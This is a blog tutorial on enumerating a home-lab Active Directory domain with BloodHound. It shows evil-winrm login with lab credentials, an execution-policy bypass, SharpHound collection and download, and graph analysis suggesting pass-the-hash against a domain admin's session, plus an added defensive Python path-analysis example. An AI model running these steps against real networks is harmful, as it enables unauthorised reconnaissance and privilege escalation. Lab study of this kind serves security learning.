Enumeration by BloodHound
posted on 11 Jul 2022 under category Active-Directory in series Active_Directory
BloodHound is a tool generally used by adversaries to visually map an organization’s Active Directory structure and analyze it for weaknesses. Being able to analyze Active Directory helps attackers identify which objects are worth targeting in an organization. Any user within an Active Directory domain can query the organization’s Active Directory, which runs on the domain controllers.
BloodHound uses a collector called SharpHound, which runs a large number of LDAP queries to collect information from Active Directory.
ruby evil-winrm.rb -i 192.168.1.2 -u superman -p 'Password123!'
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
upload /home/kali/Desktop/AD/SharpHound.ps1
PowerShell -ep bypass # bypass the PowerShell execution policy
ls # confirm the script was uploaded
. .\SharpHound.ps1 # dot-source the script to load Invoke-BloodHound
Invoke-Bloodhound -CollectionMethod All -Domain Homelab.local -ZipFileName homelab.local.zip
download 20220823031653_homelab.local.zip
Next step: install BloodHound, start neo4j, then launch BloodHound.
apt install bloodhound
sudo neo4j console
bloodhound
Back on your BloodHound instance, log in and upload the hound.zip file via the up arrow on the right of the screen. Once it is imported, click the three lines at the top left of the window to view the Database Info. This shows you the AD info, relationships and so on. There are three tabs: Database Info, Node Info and, the important one, Analysis.
To graph the data, go to the Analysis tab and choose what you would like to enumerate.
By clicking on a node you can bring up the properties of that node.
Select “Find Shortest Paths to Domain Admins”. This shows the shortest route to get to Domain Administrator. We can see that ecartman, who is a domain administrator, is logged into machine SOUTHPARK.PWNME.LOCAL, so this would be a perfect target to maybe try passing a hash and using Token Impersonation to log in to the Domain Controller etc.
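The “Find Shortest Paths to Domain Admins” query is a shortest-path search over a directed graph of relationships. The following added example (not from the original post and not BloodHound's own code) reproduces it on a small constructed graph and counts how many paths cross each edge, so a defender can see which relationship to remove first. Only ecartman and SOUTHPARK.PWNME.LOCAL come from the post; the other nodes and the function names are assumptions.

```python
from collections import deque

# Constructed sample graph (not data from the lab in the post). Edges follow
# BloodHound's direction: source --relationship--> target. Only ECARTMAN and
# SOUTHPARK.PWNME.LOCAL appear in the post; the other principals are made up.
EDGES = [
    ("JDOE@PWNME.LOCAL", "MemberOf", "HELPDESK@PWNME.LOCAL"),
    ("HELPDESK@PWNME.LOCAL", "AdminTo", "SOUTHPARK.PWNME.LOCAL"),
    ("SOUTHPARK.PWNME.LOCAL", "HasSession", "ECARTMAN@PWNME.LOCAL"),
    ("ECARTMAN@PWNME.LOCAL", "MemberOf", "DOMAIN ADMINS@PWNME.LOCAL"),
    ("JDOE@PWNME.LOCAL", "MemberOf", "DOMAIN USERS@PWNME.LOCAL"),
    ("SVC_BACKUP@PWNME.LOCAL", "AdminTo", "SOUTHPARK.PWNME.LOCAL"),
]
TARGET = "DOMAIN ADMINS@PWNME.LOCAL"

def shortest_paths_to(target, edges):
    """Reverse BFS from target. Returns {node: [(src, rel, dst), ...]} with one
    shortest edge list for every node that can reach target."""
    incoming = {}
    for src, rel, dst in edges:
        incoming.setdefault(dst, []).append((src, rel, dst))
    paths = {target: []}
    queue = deque([target])
    while queue:
        node = queue.popleft()
        for edge in incoming.get(node, []):
            src = edge[0]
            if src not in paths:  # first visit in BFS is the fewest hops
                paths[src] = [edge] + paths[node]
                queue.append(src)
    del paths[target]
    return paths

def edge_exposure(paths):
    """Count how many starting nodes depend on each edge to reach the target."""
    counts = {}
    for path in paths.values():
        for edge in path:
            counts[edge] = counts.get(edge, 0) + 1
    return counts

if __name__ == "__main__":
    paths = shortest_paths_to(TARGET, EDGES)
    for node, path in sorted(paths.items(), key=lambda kv: len(kv[1])):
        print(node, "->", " -> ".join(f"[{rel}] {dst}" for _, rel, dst in path))
    for edge, n in sorted(edge_exposure(paths).items(), key=lambda kv: -kv[1]):
        print(n, "path(s) cross", edge)
```

In this graph the HasSession edge from SOUTHPARK.PWNME.LOCAL to ECARTMAN carries every path that does not start at a Domain Admin, which is why keeping privileged logons off ordinary machines removes those paths.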
To further demonstrate the power of BloodHound, this is the result of selecting Shortest Paths to High Value Targets. This is a lab with fewer than 10 users and computers. Imagine a corporate network with hundreds… This post has shown a very small fraction of what BloodHound is capable of.